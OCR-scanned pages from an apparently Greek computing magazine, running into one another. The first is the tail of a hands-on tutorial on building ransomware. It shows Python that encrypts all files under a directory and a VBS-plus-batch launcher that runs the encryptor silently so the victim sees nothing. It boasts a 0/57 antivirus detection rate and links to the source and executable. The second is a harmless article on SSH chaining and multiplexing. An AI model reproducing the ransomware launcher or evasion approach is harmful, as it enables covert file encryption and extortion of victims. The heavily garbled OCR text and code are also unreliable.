tmpFile = os.environ['tmp'] *'Wopatis' 
startPath = '' 

password = '' 
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if len(sys.argv) = 3: ἡ Two arguments are needed for the program to 
function. 


startPath = sys.argv[1] # Arg 1: start search on this path 
password = sys.argv[2] # Arg 2: Use this password 


allFiles - getAllSubdirs(startPath) 
for file in allFiles: 
encrypt(file, tmpFile, password) 


Προσέξτε τον τρόπο που δημιουργούμε και περνάμε το προσωρινό αρχείο στη 2η 
παράμετρο της encrypt. To εν λόγω αρχείο ονομάζεται opatis και θα δημιουργηθεί 
στον κατάλογο %tmp%, ο οποίος είναι ο προσωρινός κατάλογος του χρήστη. Όποια 
προγράµµατα τρέχουν από το λογαριασμό του χρήστη, σχεδόν πάντα ἔχουν write 
access στο %tmp%. 


Σηµείωση. Το αρχείο opatis δεν διαγράφεται στο τέλος της διαδικασίας. Κανονικά, 
κάτι τέτοιο πρέπει να γίνεται στο µέρος 5 rou ransomware (εξαφάνιση хушу). Έχετε 
υπόψη ότι ορισμένα malware δεν έχουν "μέρος 5", µε συνέπεια у αφήνουν ίχνη και ot 
ειδικοί του forensics να εξάγουν χρήσιμα συμπεράσματα για την ιστορία των επιθέ- 
σεων στο υπό µελέτη box. 


Σιωπηρή ενεργοποίηση 


Όπως υποσχεθήκαµε, θα αναφέρουμε έναν τρόπο ενεργοποίησης rou executable 
χωρίς у ανοίξει κάποιο παράθυρο ἡ γενικά να γίνει κάτι που θα κάνει το χρήστη να 
συνειδητοποιήσει Órt, πράγματι, κάτι ενεργοποιήθηκε. 


Πιο συγκεκριµένα, αυτό που θα κάνουμε εἶναι va ενεργοποιήσουµε το ransomware 
από ένα VB script, το οποίο θα ro καλέσει σε επίπεδο κονσόλας χωρίς όµως αυτή va 
εμφανιστεί. Βέβαια, επειδή έχουµε και τις παραμέτρους που θέλουμε να περνάμε 
στο ransomware, θα το κάνουμε λίγο πιο σύνθετα: Θα φτιάξουμε πρώτα ένα batch 
file που θα εκτελεί ro ransomware περνώντας του τις κατάλληλες παραμέτρους, 
και µετά θα δημιουργήσουμε ro VB Script file που όταν εκτελείται από το χρήστη 
καλεί το batch file. Το δόλωμα θα είναι το VBS και σας εγγυόμαστε ότι μόλις δείτε 
τον κὠδικά του όλα θα ξεκαθαρίσουν: 


VB Script file: run.hidden.vbs 


Set WshShell = CreateObject("WScript.Shell"): WshShell.Run chr(34) & "A 
myRansomware.bat" & Chr(34), 6: Set WshShell = Nothing 


Batch file: myRansomware.bat 
file.exe c:\work2 ! 


To µόνο που μένει λοιπόν είναι να κάνει o χρήστης ένα κλικ στο αρχείο run.hidden. 
vbs και στη συγκεκριμένη περίπτωση δεν θα δει απολύτως τίποτα να συμβαίνει, 
παρά µόνο να ανάβει το λαμπάκι του σκληρού του δίσκου (αν υπάρχει)! To παραπά- 
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VW, μόλις εκτελεστεί, θα ενεργοποιήσει το κακόβουλο rtpóypaupa үа тоу κατάλογο 
с\могКк2 µε κλειδί το "!" (χωρίς τα εισαγωγικά. Όπως επίσης θα έχετε καταλάβει, 
έχουμε ονομάσει το ransomware "file.exe". 


Οι δοκιµές µας και ra antivirus 


To πρόγραµµα то δοκιµάσαµε σε Windows 7 Home & Premium edition, ενώ δοκιµάσα- 
ре και διαφόρους τύπους αρχείων. Δείτε ra screenshots που ακολουθούν. 


Edit Options 
Hello there* 
Hou are you? 
Είμαι 'FEñanuac όμως! 


| File Encoding Help 


Lister - [c\work2\hello.txt] 


File Edit Options Encoding Help 
8—...P-^—-()z28.-P«--P.. |0)zp .*ШРӨШШШ.“ШР..ШШ0}2 


< Ы 


Εικόνα 1 
Κρυπτογραφούνται και αποκρυπτογραφούνται όλα Ta... code pages ;) 


Home | Insert Page Layout References Mailings Review View Ф Ө 


m: πες 
Ba B Z U-se x, х | 8 


Paste b Hd Paragraph Styles Editing 
- Ф 8⁄ + A + Aar | Α΄ А ` ` +” 


Clipboard 


Font 2 


The file hello.docx cannot be opened because there are problems with the 


contents. 


ын >> 


Εικόνα 2 
Αρχείο Word µετά την 
κρυπτογράφηση... 
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Δημιουργία rou δικού µας ransomware 


Home | Insert Page Layout Refer 


Ανεβάσαµε εξάλλου To file.eexe oro 
VirusTotal, στε να ελεγχθεί апо µια 
πληθώρα από μηχανές antivirus. Αυτό TO 


^ Calibri (Body) "1 τ. κάναμε γνωρίζοντας για τις φήμες -ὀχι 
ΕΕ в. I U + фе х, ж | 3 αποδείξεις, μόνο φήμες-- ότι TO συγκε- 
4| 5-9 a SL u κριμένο site συνεργάζεται µε εταιρείες 


εφαρμογών ασφαλείας και τους παρέχει 


Clipboard г Font T ‚ F р 
κωδικα που ката καιρούς ανεβαίνει στο 
site. Έτσι, αν κάποιο πρόγραµµα βρἰσκε- 
ται να έχει, π.χ., 10% positives στο 1o ανέ- 
βασμα, µετά апо κάποιες μέρες αυτό το 
10% ξαφνικά ίσως έχει γίνει 4096 — όλως 
τυχαίως. Εμείς πάντως έχουµε να πού- 
με ότι στις 04/06/2015 18.03 UTC που 

Hellothere! ανεβάσαμµε ro file.exe, πήραμε detection 
ratio 0/57! 

How are you? ‚ ‚ 

Š е Μπορείτε va κατεβάσετε τον πηγαίο 

Είμαι Ἑλληνας όμως! ; | 
κώδικα TOU μικρού μας ransomware 
(ransomware.py), μαζί µε ra run.hidden. 

Eikóva 3 


-και TO ίδιο αρχείο Word µετά την 


αποκρυπτογράφηση. 


vbs, myRansomware.bat και file.exe, από 
TO http://bit.|ly/dHO044ransomware. Mpo- 
τείνουμε να πειραµατιστείτε σε éva 
ασφαλές περιβάλλον (π.χ., σε VM) και 
βεβαίως επισηµαίνουµε ότι σε κάθε TE- 
ρίπτωση οφείλετε να φέρεστε υπεύθυ- 
να. Καλή σας διασκέδαση! 


В? Antivirus scan for b2bf83* x 
06 


€ С fi B https//wwwvirustotal.com/en/file/b2bf8352d0159í32 


c85cb71192517d3490 «у Q 1 @ F Ὁ eí 


J G-Translate (7] Bookmarks “A Bookmarks Ж Bookmarks 


* Community 


РА 


SHA256: 
File name: 
Detection ratio: 


Analysis date 


Statistics Documentation FAQ About же English Join our community Sign 


b2bf8352d0159f3279c 06d74c688c85cb71192517d34901e1 1f6d4b155c 86239 e^ 
file.exe 


Me Фо o0 


2015-06-04 18:03:42 UTC ( 5 minutes ago ) 


E Analysis @ File detail @ Additional information Ф Comments o τ) Votes E Behavioural information 
Antivirus Result Update 
ALYac © 20150604 


Εικόνα 4 
Hellooo! I'm a bad guy! 
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Skill: Beginner 
Tags: SSH chaining, SSH multiplexing, escaping, desktop notifications 


H φιλική πλευρά 
του SSH 


[μέρος 2ο] 


Νομίζετε ότι στο προηγούμενο µέρος εξαντλήσαμε όλεςτις ευκολίες που 
παρέχει ro SSH; Πιστεύετε ότι αυτό το πανίσχυρο εργαλείο δεν έχει τίποτε 
άλλο va µας προσφέρει; Ma, av ίσχυε κάτι τέτοιο, TO άρθρο που έχετε μπροστά 
σας δεν θα υπήρχε ;) 


του Παναγιώτη Βαρελά 


Στο άρθρο rou προηγούμενου τεύχους εστιάσαµε σε ορισμένες λεπτομέρειες, που 
όταν τις γνωρίζει κανείς µπορεί να χειρίζεται τις συνδέσεις 95Η µε µεγαλύτερη 
άνεση. Επιπρόσθετα, εξετάσαµε µερικά σενάρια ота οποία η χρήση του SSH ενδέχε- 
ται у αποδειχθεί πολύτιμη. Σε αυτό το άρθρο θα εξερευνήσουµε τις πιο προχωρη- 
μένες δυνατότητες του SSH, μελετώντας ένα ακόµα πιο περίπλοκο σενάριο. Πα TO 
τέλος θα αφήσουμε μερικές ακόµα ρυθμίσεις, που αναδεικνύουν την ευχρηστία και 
τη φιλικότητα αυτού του πανίσχυρου εργαλείου. Όμως ας αφήσουμε τις σάλτσες κι 
ας προχωρήσουμε ευθύς αµέσως στη µελέτη. 


Φανταστείτε éva σύνολο μηχανημάτων που βρίσκονται στο (Oto τοπικό δίκτυο και 
βγαίνουν στο Internet µέσω ενός συγκεκριμένου μηχανήματος, που ἐχει το ρόλο 
router/gateway. Αυτή η τοπολογία δεν εἶναι καθόλου σπάνια κι éva τέτοιο δίκτυο 
θα μπορούσε να βρίσκεται στο χώρο της δουλειάς, σε µια σχολή, σε κάποιο hacker 
space ñ ακόµη και στο σπίτι µας. Αν υποθέσουμε ότι έχουµε πρόσβαση SSH σε όλα 
τα μηχανήματα του τοπικού δικτύου, πόσο εύκολο πιστεύετε ὁτι εἶναι να συνδε- 
θούμε σε κάποιο από αυτά, ενώ είμαστε εκτός τοπικού δικτύου; Το συγκεκριµένο 
ερώτημα μοιάζει µε εκείνο που απαντήσαµε στο τέλος του προηγούμενου άρθρου. 
Αυτή τη φορά όµως θα εξετάσουμε µια εντελώς διαφορετική λύση. 


Προκειμένου να συνδεθούµε σε κάποιο μηχάνημα όταν είμαστε εκτός τοπικού ӧі- 
κτύου, λοιπόν, Évac τρόπος είναι να ακολουθήσουμε µια σχεδόν αυτονόητη διαδικα- 
σία δύο, τουλάχιστον, απλών βημάτων: а) va συνδεθούµε στη γραμμή εντολών του 
router και В) από εκεί να συνδεθούµε στο επιθυμητό μηχάνημα του τοπικού δικτύου. 
Αναρωτιέστε γιατί είπαμε ότι χρειάζονται τουλάχιστον δύο βήματα, τη στιγµή που 
θα μπορούσαν να υπάρχουν στον router µερικοί κανόνες port forwarding; Διότι αν το 
μηχάνημα στο οποίο θέλουμε να συνδεθούµε ανήκει σε κάποιο υποδίκτυο του τοπι- 
κού δικτύου, θα χρειαστεί να πραγµατοποιήσουµε éva πρόσθετο βήμα. Θαπρέπει va 
κάνουμε µια ενδιάμεση σύνδεση, προς το μηχάνημα που λειτουργεί ως gateway για 
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TO υποδίκτυο. Όπως avriAaupBáveore, όσο αυξάνεται η πολυπλοκότητα TOU τοπικού 
δικτύου και το "βάθος" στο οποίο θέλουμε να φτάσουμε, αυξάνεται και το πλήθος 
των απαιτούμενων (ενδιάμεσων) συνδέσεων. Δεν χρειάζεται όμως να σκεφτόμα- 
στε τόσο περίπλοκα σενάρια. Ακόμα και στην απλή περίπτωση των δύο βημάτων, 
είναι φανερό ότι η διαδικασία σύνδεσης θα καταντήσει εύκολα πολύ κουραστική. E, 
λοιπόν, το SSH μπορείνα απλοποιήσει uta τέτοια σύνδεση, απαλλάσσοντάς μας από 
την επανάληψη των ενδιάμεσων βημάτων "όσα κι αν εἶναι αυτά. Κατά τα γνωστά, 
αρκεί να επέµβουµε στο αρχείο ρυθμίσεων (—/.ssh/config) και να προσθέσουμε AC 
YEG γραμμές. Αν πιστεύετε ότι µας χτύπησε η καλοκαιρινή терпела και αναζητάµε 
μεθόδους γιανα πληκτρολογούμε λιγότερο, συνεχίστε να διαβάζετε και θα αλλάξε- 
τε γνώμη. Εκτός από άνεση και ταχύτητα, η τεχνική που θα περιγράψουμε προσφέ- 
ρει και αυξημένη ασφάλεια. 


Αλυσιδωτή διασύνδεση 


Ας υποθέσουμε ότι θέλουμε va συνδεθούμε о éva μηχάνημα, που βρίσκεται στο TO- 
πικό δίκτυο ενός εργαστηρίου της σχολής και έχει σαν hostname то lab-workstation3. 
Ας υποθέσουμε επίσης ότι το τοπικό δίκτυο του εν λόγω εργαστηρίου βγαίνει στον 
έξω κόσµο µέσω ενός server, στη δημόσια διεύθυνση του οποίου έχει αντιστοιχηθεί 
το informatics-lab.gr. Па va καταλήξουμε στη γραμμή εντολών rou lab-workstationg3, 
θα έπρεπε να συνδεθούµε πρώτα στον server rou εργαστηρίου: 


ssh informatics-lab.gr 


Στη συνέχεια, апо τη γραμμή εντολών του συγκεκριμένου μηχανήματος θα έπρεπε 
να δώσουμε: 


ssh lab-workstation3 


Φυσικά, για αυτές τις δύο συνδέσεις ενδέχεται va απαιτούνται διαφορετικά 
usernames, ενώ και ot SSH servers ενδέχεται v' ακούνε από διαφορετικές ὄικτυα- 
κές θύρες. Με άλλα λόγια, η διαδικασία σύνδεσης µπορεί να µην εἶναι τόσο απλή. 
Εξάλλου, ακόµη κι αν χρησιμοποιείται παντού η καθιερωμένη θύρα (port 22/TCP) κι 
έχουµε το (Oto username σε όλα ra μηχανήματα (λέμε, τώρα), θα πρέπει να θυμόμα- 
στε τα αντίστοιχα συνθηµατικά. Πώς είπατε; Μπορούμε να χρησιμοποιήσουμε τη 
μέθοδο µε το δημόσιο και το ιδιωτικό κλειδί; Αυτό θα μπορούσαμε να το κάνουμε 
για τη σύνδεση στο gateway, αλλά ὀχι και για τη σύνδεση στο µηχάνηµα του τοπι- 
κού δικτύου. Πα τη δεύτερη σύνδεση, βλέπετε, θα έπρεπε να αποθηκεύσουµε το 
ιδιωτικό µας κλειδί στον server της σχολής. Περιττό να πούμε ότι κάτι τέτοιο θα 
συνιστούσε τεράστιο σφάλμα! Όπως έχουµε ξαναπεί, τα ιδιωτικά κλειδιά πρέπει 
να φυλάσσονται πάντα µε μεγάλη προσοχή kat va µην κυκλοφορούν από εδώ κι από 
κεί, για *kavéva* λόγο. 
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Ευτυχώς υπάρχει µια ασφαλέστερη λύση, που προσφέρει και μεγαλύτερη ευκολία. 
Αναφερόμµαστε σε µιατεχνική που είναι γνωστή κι ως SSH chaining. Για την εφαρµο- 
γή της, αρκεί να ανοίξουμε το αρχείο ρυθμίσεων του SSH στον υπολογιστή µας (~/. 
ssh/config) και va προσθέσουμε τις ακόλουθες γραμμές: 


Host lab-srv 
HostName informatics-lab.gr 
Port 34522 
User pvar 
Host lab-pc 
ProxyCommand ssh -q lab-srv -W lab-workstation3:22 
User spiral 


Υποψιάζεστε τιπετυχαίνουµε µε ra παραπάνω; Αρχικά δημιουργούμε ένα SSH alias, 
για την εὐκολη σύνδεση στον server του εργαστηρίου της σχολής. Στη συνέχεια 
δημιουργούμε ένα ακόµα SSH alias, για τη σύνδεση στο μηχάνημα lab-workstation3. 
Το ενδιαφέρον εντοπίζεται στο δεύτερο alias, όπου αξιοποιούμε την επιλογή 
ProxyCommand. Με αυτή τη ρύθμιση ζητάμε από ro SSH να µην πραγματοποιήσει 
τη σύνδεση αµέσως, αλλά αφού προηγουμένως εκτελέσει µια εντολή που καθορί- 
ζουμε εμείς. Όπως βλέπετε, η εντολή που επιλέξαμε εἰναι η ακόλουθη: 


ssh -q lab-srv -W lab-workstation3:22 


Με την εκτέλεση TOU παραπάνω πραγματοποιείται µια σύνδεση προς rov server της 
σχολής, µέσω της οποίας προωθούνται όλες ot επακόλουθες συνδέσεις στο un- 
xàvnua lab-workstation3. Τελικά, όταν χρησιμοποιούμε το δεύτερο SSH alias праү- 
ματοποιείται αυτόματα µια βοηθητική σύνδεση προς rov server του εργαστηρίου, 
μέσω της οποίας προωθούμαστε στο μηχάνημα lab-workstation3. Έτσι, η σύνδεση 
SSH που επιχειρούµε μεταβιβάζεται αυτομάτως στο επιθυμητό μηχάνημα και XW- 
pic να χρειαστεί апо µέρους µας κάποια πρόσθετη ενέργεια. Μετά από την προσθή- 
кп των παραπάνω στο αρχείο ρυθμίσεων rou SSH, η σύνδεσή μας στο μηχάνημα του 
εργαστηρίου θα µπορεί να επιτευχθεί µε μία κίνηση: 


ssh lab-pc 


Αυτός o rpórtoc σύνδεσης είναι σαφέστατα ruo απλός και πιο γρήγορος. Όμως γιατί 
ισχυριστήκαµε ότι προσφέρει και περισσότερη ασφάλεια; Με τις ρυθμίσεις που na- 
ρουσιάσαµε, το σύστημά µας συνδέεται απευθείας στο μηχάνημα lab-workstation3. 
Μπορεί να μεσολαβεί µια βοηθητική σύνδεση, αλλά ο SSH client που τρέχει στο 
μηχάνημά µας, όπως και o SSH server που εκτελείται στην άλλη άκρη, δεν TO γνω- 
ρίζουν. Αυτό που πρέπει να κρατήσουμε εδώ εἰναι ότι η πιστοποίηση του χρήστη 
(authentication) πραγματοποιείται απευθείας ανάµεσα στα δύο συστήµατα (το δικό 
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μας και του εργαστηρίου). Επομένως, αρκεί va κατασκευάσουµε ένα ζεύγος κλει- 
διών και να εγκαταστήσουµε το δημόσιο στον server της σχολής καθώς και ото lab- 
workstation3. Το ιδιωτικό κλειδί θα βρίσκεται "μόνον στο δικό µας μηχάνημα και η 
σύνδεση στα προαναφερθέντα συστήµατα θα πραγματοποιείται κανονικότατα και 
ре τη µέγιστη ασφάλεια. 


Σηµεία προσοχής 


Στις ρυθμίσεις που παρουσιάσαµε προηγουμένως συνδυάσαµε τη λειτουργία 
ProxyCommand µε µια άλλη λειτουργία του SSH, που ενεργοποιείται µε την παρά- 


μετρο -W. H σχετική γραμμή είχε ως εξής: 
ProxyCommand ssh -q lab-srv -W lab-workstation3:22 


H παράμετρος -W εξασφαλίζει την προώθηση των επακόλουθων συνδέσεων και, 
στη συγκεκριμένη περίπτωση, το σηµείο προορισμού είναι η θύρα 22 του συστή- 
ματος lab-workstation3. Αυτό βέβαια το εἰπαμε και προηγουμένως. Κάτι που δεν 
αναφέραμε είναι ότι η παράμετρος -W δεν διατίθεται στις παλιές εκδόσεις TOU 
OpenSSH, πριν από την 5.4. Επομένως, αν για κάποιο (απαράδεκτο) λόγο ra µηχανή- 
рата διαθέτουν παλιές εκδόσεις του OpenSSH, η λύση που παρουσιάσαµε δεν θα 


LAB LAN 
lab-workstation1 lab-workstation5 


[— — lab-workstation2 lab-workstation6 


ν ~ _— j| 
"E informatics-lab.gr 
ENS ER lab-workstation3 коа 
НОМЕ-РС 


lab-workstation4 lab-workstation8 


To μηχάνημα που θέλουμε να συνδεθούµε βρίσκεται µέσα σε éva τοπικό 
δίκτυο, Το οποίο συνδέεται στο Internet µέσω ενός server/gateway. 
Διαθέτουμε λογαριασμούς SSH για όλα τα μηχανήματα και ro firewall δεν µας 
εμποδίζει να συνδεθούµε στον server. Εν ολίγοις, η σύνδεσή µας στο μηχάνημα 
lab-workstation3 µπορεί να πραγµατοποιηθεί ανεµπόδιστα, σε δύο βήματα. 
Δυστυχώς, TO ανεµπόδιστα δεν σηµαίνει ότι αυτός ο τρόπος σύνδεσης δεν 
είναι κουραστικός. Πώς θα μπορούσαμε va τον απλοποιήσουμε; 
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λειτουργήσει. Στην περίπτωση που δεν εἶναι στο χέρι рас n αναβάθµισή τους, рпо- 
ρούμε να πετύχουμε την προώθηση των επακόλουθων συνδέσεων µε τη βοήθεια 
TOU netcat. Έτσι, η γραµµή µε το ProxyCommand 8a γίνει κάπως έτσι: 


ProxyCommand ssh -q lab-srv nc -q0 lab-workstation3 22 


Σημειώστε ότι n δικτυακή θύρα διακρίνεται πλέον µε ένα χαρακτήρα κενού και όχι 
µε την άνω-κάτω τελεία (colon). Παρεμπιπτόντως, η δικτυακή θύρα από την οποία 
ακούει o SSH server rou lab-workstation3 πρέπει να προσδιοριστεί ακριβώς εκεί 
όπου συμβαίνειη προώθηση και ὀχισε ξεχωριστή γραμμή των ρυθμίσεων. Av η προ- 
ώθηση δεν γίνει σωστά, τότε όσες άλλες ρυθμίσεις κι av συμπεριλάβουµε θα είναι 
περιττές. Πα va µη σας κουράζουµε µε άλλες περιγραφές, σκεφτείτε ότι αυτό θα 
δουλέψει κανονικά: 


Host lab-pc 
ProxyCommand ssh -q lab-srv -W lab-workstation3:32128 
User spiral 


Οι ακόλουθες pu8uítostc, όμως, θα αποτύγχαναν... 


Host lab-pc 
ProxyCommand ssh -q lab-srv -W lab-workstation3 
User spiral 
Port 32128 


Н μέθοδος που παρουσιάσαµε θα μπορούσε va επεκταθεί πανεύκολα, για την AUTO- 
ματοποίηση περισσότερων συνδέσεων. Φανταστείτε την περίπτωση που θέλουμε 
να συνδεθούµε о éva μηχάνημα της δουλειάς, που βρίσκεται σε κάποιο υποδίκτυο, 
μέσα σε ένα άλλο υποδίκτυο rou εταιρικού δικτύου. Χωρίς τον αυτοματισμό θα 
απαιτούνταν τέσσερις συνδέσεις: Μία προς ro gateway ολόκληρου του δικτύου της 
δουλειάς, µία προς ro gateway του πρώτου υποδικτύου, μία προς το gateway του 
᾿εμφωλευμένου" υποδικτύου και µία ακόµα προς ro µηχάνηµα-προορισµό. Όλα αυτά 
θα μπορούσαν να αυτοματοποιηθούν µε ένα σύνολο ρυθμίσεων cav το ακόλουθο: 


Host work-gateway 
HostName some-company-srv.gr 
Port 34522 
User pvar 

Host rnd-subnet-gateway 
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ProxyCommand ssh -q work-gateway -W 192.168.1.100:32128 
User pvar 

Host devs-subnet-gateway 
ProxyCommand ssh -q rnd-subnet-gateway -W 10.0.0.50:44156 
User pvar 

Host lab-pc 
ProxyCommand ssh -q devs-subnet-gateway -W 192.168.1.27:2222 
User spiral 


Πριν προχωρήσουμε σε άλλα θέματα, αξίζει va αναφέρουμε µια ενδιαφέρουσα ιδέα. 
Μπορεί να 


σκεφτόσαστε ὀτιτοσενάριοτων αλλεπάλληλων συνδέσεων είναι αρκετά εξεζητη- 
μένο kat ότι το τέχνασμα που παρουσιάσαµε είναι άχρηστο για εσάς. Е, λοιπόν, υπάρ- 
χει ένας τρόπος va το αξιοποιήσουν σχεδόν όλοι, ακόµα κι αν δεν ἔχουν πρόσβαση 
σε εταιρικά δίκτυα, σε εργαστήρια κ.λπ. Σκεφτείτε την περίπτωση που συντηρείτε 
μερικά VPS, για διάφορες δουλειές ή και δοκιμές. Ένας ανορθόδοξος τρόπος να au- 
ξήσετε την ασφάλειάτους θαήταν va ρυθμίσετε κατάλληλα ro firewall του καθενός, 
ώστε να δέχεται συνδέσεις SSH μόνον από ένα συγκεκριµένο VPS. Πα παράδειγμα, 
αν έχετε τρεις servers µε τα ονόματα УР51, VPS2 και VPS3, θα μπορούσατε να τους 
ρυθμίσετε шоте οι VPS2 και VPS3 να δέχονται συνδέσεις SSH μόνον από rov VPSI. 
Με αυτόν τον τρόπο, ot VPS2 και VPS3 θα εἶναι ελαφρώς ruo προστατευμένοι, ενώ 
εσείς θα µπορείτε να συνδεθείτε πανεύκολα, αξιοποιώντας την τεχνική που παρου- 
σιάσαµε και то VPS] ως ενδιάμεσο σκαλοπάτι. Ακόμα κι αν καταφέρει κανείς να εἰ- 
σβάλει στο VPS1, οι άλλοι δύο servers θα παραμείνουν ασφαλείς, αφού το ιδιωτικό 
κλειδί για τη σύνδεση θα βρίσκεται µόνο στο δικό σας μηχάνημα. 


Ανακύκλωση 


Με ола та κολπάκια που έχουµε δει ως τώρα, ενδέχεται va σας ανοίξαµε την ὀρεξη. 
Ακόμα κι αν μέχρι πρότινος δεν αξιοποιούσατε ιδιαίτερα τις συνδέσεις SSH, είναι 
πολύ πιθανό να αρχίσετε τώρα. Εμείς, για παράδειγµα, έχουµε αρχίσει ήδη va σκε- 
φτόμαστε scripts που δημιουργούν αντίγραφα ασφαλείας σε απομακρυσμένα µηχα- 
νήματα, διανέμουν και διαχειρίζονται τον κὠδικα που αναπτύσσουμε апо κοινού µε 
άλλους χρήστες, φροντίζουν γιατην αυτόματη ενηµέρωση/αναβάθµιση των servers 
και πάει λέγοντας. Μη νομίζετε ότι υπερβάλλουμε. Н χρήση rou SSH σε τέτοιες ερ- 
γασίες προσφέρει αυξημένη ασφάλεια και αξιοπιστία. Το µόνο μειονέκτημα που θα 
μπορούσε να εντοπίσει κανείς αφορά στην επιβάρυνση του δικτύου και του συστή- 
ματος, που επιφέρει η διαρκής και αυτοματοποιημένη πραγματοποίηση συνδέσεων. 
Αυτή η επιβάρυνση είναι αμελητέα όταν πραγματοποιούµε συνδέσεις προς µηχανή- 
рата του ίδιου τοπικού δικτύου, αλλά αρχίζει να γίνεται αισθητή όταν συνδεόµαστε 
σε απομακρυσμένα συστήµατα, µε περιορισμένους πόρους και αργή σύνδεση. 
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To SSH προσφέρει µια αποδοτική λύση γι αυτό το πρόβλημα, που ακούει στο Óvo- 
μα SSH multiplexing. Με απλά λόγια, πρόκειται για τη διατήρηση των συνδέσεων 
μας στο υπόβαθρο του συστήµατος, ακόµα και όταν ζητάμε τον τερματισμό τους. 
Όταν επιχειρούµε µια σύνδεση που είχαμε πραγματοποιήσει νωρίτερα, η εγκαθί- 
ӧроой της πραγματοποιείται σχεδόν ακαριαία! Στην πραγματικότητα δεν δηµιουρ- 
γείται νέα σύνδεση, αλλά ενεργοποιείται και επιστρέφει στο προσκήνιο η παλιά. 
Κι av για κάποιο λόγο ζητήσουμε τη δημιουργία µιας πρόσθετης σύνδεσης µε τα 
ίδια χαρακτηριστικά, το SSH θα αξιοποιήσει τα αποθηκευμένα δεδοµένα ώστε να 
παρακάμψει αρκετά στάδια της αρχικοποίησης της σύνδεσης. Με αυτόν τον τρόπο, 
η δηµιουργία συνδέσεων που είχαν πραγµατοποιηθεί και νωρίτερα επιταχύνεται 
σε µεγάλο βαθµό. Προκειμένου να ενεργοποιήσουµε το σχετικό μηχανισμό, πρέπει 
πρὠτα να δημιουργήσουμε έναν κατάλογο үа rnv αποθήκευση των δεδομένων των 
συνδέσεων; 


mkdir -/.ssh/tmp 
chmod 700 -/.ssh/tmp 


Αμέσως µετά τη δηµιουργία είναι φρόνιμο va τροποποιήσουµε ra δικαιώµατα πρό- 
σβασης. Όπως βλέπετε, απαγορεύουµε κάθε ενέργεια στους υπόλοιπους χρήστες 
και επιτρέπουµε τα πάντα για το δικό µας λογαριασμό και µόνο. Αυτό το κάνουμε 
γιατί τα αρχεία που θα τοποθετούνται στο συγκεκριµένο κατάλογο θα περιλαμβά- 
νουν κρίσιµα δεδοµέναγιατις συνδέσεις µας κι εν δυνάμει ευαίσθητα. Στη συνέχεια 
μπορούμε να ανοίξουμε το αρχείο ρυθμίσεων (—/.ssh/config) και να ενεργοποιήσου- 
ре την "ανακύκλωση",  προσθέτονταςτις ακόλουθες γραμμές: 


Host * 
ControlMaster auto 
ControlPath -/.ssh/tmp/%h-%r-%p 
ControlPersist 900 


To ControlPath προσδιορίζει τη θέση και τη µορφή των ονομάτων των αρχείων που 
δημιουργούνται για κάθε σύνδεση. Τα %h, ?er και “ορ αντικαθίστανται αυτόματα апо 
το буора του μηχανήματος στο οποίο έχουµε συνδεθεί, το username που χρησιμο- 
ποιήσαµε για τη σύνδεση και τη δικτυακή θύρα του αποµακρυσμένου συστήματος. 
Έτσι, εξασφαλίζουµε оту τα αρχεία που δημιουργούνται έχουν μοναδικά ονόματα, 
που προσδιορίζουν πλήρως την εκάστοτε σύνδεση. Το μέγεθος ControlPersist ano- 
τελεί το χρονικό διάστηµα κατά το οποίο Θα διατηρείται στο δίσκο κάθε ανενεργή 
σύνδεση. H µονάδα μέτρησης που υπονοείται είναι τα δευτερόλεπτα και κατ’ ETÉ- 
κταση, η τιµή που φαίνεται παραπάνω (900) αντιστοιχεί σε 15 λεπτά. H επιλογή 
αυτής της τιμής πραγματοποιήθηκε αυθαίρετα και µπορείτε va την προσαρμόσετε 
ελεύθερα, ανάλογα µε τη φύση των εργασιών σας. Πάντως, επειδή τα δεδοµένα που 
αποθηκεύονται στο δίσκο εἶναι κρίσιμα, είναι φρόνιμο va µην τα διατηρούµε περισ- 
σότερο απ’ боо χρειάζεται. 
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Αυτό ήταν όλο! Στο εξής, οι συνδέσεις SSH που πραγματοποιούµε συχνά -όπως 
και εκείνες που γίνονται σε τακτά χρονικά διαστήματα από τα σκριπτάκια рос, θα 
μοιάζουν να εγκαθιδρύονται ακαριαία. 


Έξυπνες ειδοποιήσεις 


Στο ξεκίνημα του άρθρου κάναμε τη σιωπηρή παραδοχή ότι θα εργαστούμε στο 
Linux. Αν και όλες οι διανομές περιλαμβάνουν κάποιο παραθυρικό περιβάλλον, ué- 
χριστιγµής έχουµε εξετάσει κολπάκια και τεχνικές που εφαρμόζονται апо TN γραµ- 
μή εντολών ενός τερματικού. Κάτι τέτοιο ήταν αναμενόμενο, αφού η κονσόλα προ- 
σφέρει μακράν περισσότερη ευελιξία. Αποφασίσαμε μολαταύτα να παρουσιάσουμε 
µια απλή τεχνική, που κατά κάποιον τρόπο φέρνει τις συνδέσεις SSH oro περιβάλ- 
λον γραφικών. Εντάξει, OXL τις ίδιες τις συνδέσεις, αλλά τις σχετικές ειδοποιήσεις 
(notifications). Για παράδειγµα, φανταστείτε την εμφάνιση µιας ειδοποίησης κάθε 
φορά που ένα script συνδέεται σε κάποιο μηχάνημα µε σκοπό να δημιουργήσει αντί- 
үрафа εφεδρείας. Πα va πετύχουμε κάτι τέτοιο, θα επιστρατεύσουµε éva εργαλείο 
της γραμμής εντολών που ονομάζεται notify-send. Στις διανομές που βασίζονται 
στο Debian, το εν λόγω πρόγραµµα βρίσκεται στο πακέτο libnotify-bin. Αν δεν υπάρ- 
χει ήδη στο σύστημά µας, µπορεί να εγκατασταθεί ως εξής: 


sudo apt-get install libnotify-bin 


To ίδιο πρόγραµµα, oro openSUSE και στις συγγενικές διανομές βρίσκεται oro ma- 
κέτο libnotify-tools και η εγκατάστασή του πραγματοποιείται εξίσου εύκολα (sudo 
zypper install libnotify-tools). Αφού εξασφαλίσουµε ότι το notify-send λειτουργεί Ka- 
νονικά, μπορούμε να προχωρήσουμε στην κατάλληλη ρύθμιση του SSH. Αφού ανοί- 
ἔουμε και πάλι το αρχείο ρυθμίσεων (—/ssh/config), αρκεί va προσθέσουμε τα εξής: 


Host * 
PermitLocalCommand yes 
LocalCommand -/bin/notify.sh %h %г 


Σημειώστε ότι av το αρχείο ρυθµίσεων περιλαμβάνει ήδη éva μπλοκ για όλες τις 
συνδέσεις (Host *), δεν χρειάζεται να δημιουργήσετε και πρόσθετο (δεν θα ήταν 
κομψό). Αντίθετα, στο υπάρχον µπλοκ µπορείτε να προσθέσετε τις ρυθµίσεις που 
φαίνονται παραπάνω. Η λειτουργία LocalCommand προβλέπει την εκτέλεση µιας 
"εντολής" τοπικά (στο δικό µας μηχάνημα), κάθε φορά που πραγματοποιείται µια 
σύνδεση. Στη συγκεκριμένη περίπτωση η εντολή που καθορίσαµε εἰναι το script 
ονόματι notify.sh, που βρίσκεται µέσα oro home directory του λογαριασμού µας και 
